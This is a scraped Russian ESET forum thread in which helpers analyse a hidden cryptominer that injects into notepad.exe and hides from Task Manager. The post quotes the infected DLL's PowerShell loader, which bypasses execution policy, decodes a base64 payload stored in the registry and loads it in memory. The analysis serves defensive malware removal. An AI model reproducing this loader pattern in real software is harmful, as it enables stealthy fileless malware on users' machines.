Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.
Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.
Купить и продлить лицензии ESET на нашем сайте больше нельзя.
Предлагаем вам попробовать новые продукты компании PRO32.
PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.
в данном случае, когда остались только хвосты от майнера, а в образе автозапуска практически нет информации о нем после предварительной зачистки вирусни, больше пользы было от логов FRST а именно:
что можно интерпретировать как пустые каталоги, без файлов, с атрибутами SH R - Атрибут "Только чтение". A - Атрибут "Архивный". S - Атрибут "Системный". H - Атрибут "Скрытый".
+ этот скрипт выполните в FRST Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
по активным сейчас темам Trojan.Multi.GenAutorunProc.a на некоторых форумах что можно сказать.
симптомы, пример:
Цитата
заметил, что моя любимая игрушка начала тормозить, включил msi afterburner с выводом информации про загрузку и температуру процессора на экран, загрузка достигала 50-100% на всех 8 ядрах. Решил открыть диспетчер задач, он показал что процессор загружен на 10-15%, не закрывая диспетчер задач зашел в игру, мси афтербернер показал 10-15%, игра перестала тормозить, закрыл диспетчер задач и игра снова стала тормозить. Я скачал прогу system explorer и она показала запущенный процесс notepad.exe, который потребляет 37,5% процессора. при открытии снова диспетчера задач, notepad.exe скрылся из запущенных процессов в system explorer, после закрытия диспетчера задач, notepad.exe снова запустился.
довольно интересная картина происходит, которая может быть скрыта за текстовыми логами.
есть свежая задача Win32Utilities, из которой запущена dll C:\Users\Pro\AppData\Roaming\WindowsShell\WindowsDiagnostics.dll 6,00 кб, rsAh, создан: 03.03.2020 19:11:07, изменен: 03.03.2020 19:39:19 следующим образом: rundll32.exe C:\Users\Pro\AppData\Roaming\WindowsShell\WindowsDiagnostics.dll,Task и все.
что мы видим в образе автозапуска: во первых обнаружены потоки внедренные в процесс notepad.exe (!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\NOTEPAD.EXE [1860], tid=9912 во вторых, видим процесс, связанный так или иначе с запуском notepad.exe, явно связанный с майнером
судя по командной строке, часть командной строки формируется из ключа HKCU:\Software\WinSys32, можно предположить, что значение ключа закодировано в base64
каким образом запущены процессы с участием powershell? а вот отсюда, часть содержимого windowsdiagnostic.dll:
Цитата
Maindir Task a p p d a t a \ W i n d o w s S h e l l p o w e r s h e l l ‚%- E x e c u t i o n P o l i c y B y p a s s - N o E x i t - N o P r o f i l e - C o m m a n d $ s = ( G e t - I t e m P r o p e r t y H K C U : \ S o f t w a r e \ W i n S y s 3 2 \ ) . w i n ; $ r = $ s . r e p l a c e ( ' . ' , ' 2 ' ) . r e p l a c e ( ' ( ' , ' 3 ' ) . r e p l a c e ( ' - ' , ' 1 ' ) ; $ b = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ r ) ; [ S y s t e m . R e f l e c t i o n . A s s e m b l y ] : : L o a d ( $ b ) ; [ G A S . A d ] : : C U ( ) ; E x i t ( 0 )
какая связь между процессом powershell и notepad?
а вот и явная связь.
по образу видим, что pid=8960 соответствует cmdline:
[ Закрыто] Антивирус не позволяет увидеть компьютеры в локальной сети., NOD 32 Internet Security 13. 0. 24. 0 я не вижу компьютеры подключенные к локальной сети.
[ Закрыто] Антивирус не позволяет увидеть компьютеры в локальной сети., NOD 32 Internet Security 13. 0. 24. 0 я не вижу компьютеры подключенные к локальной сети.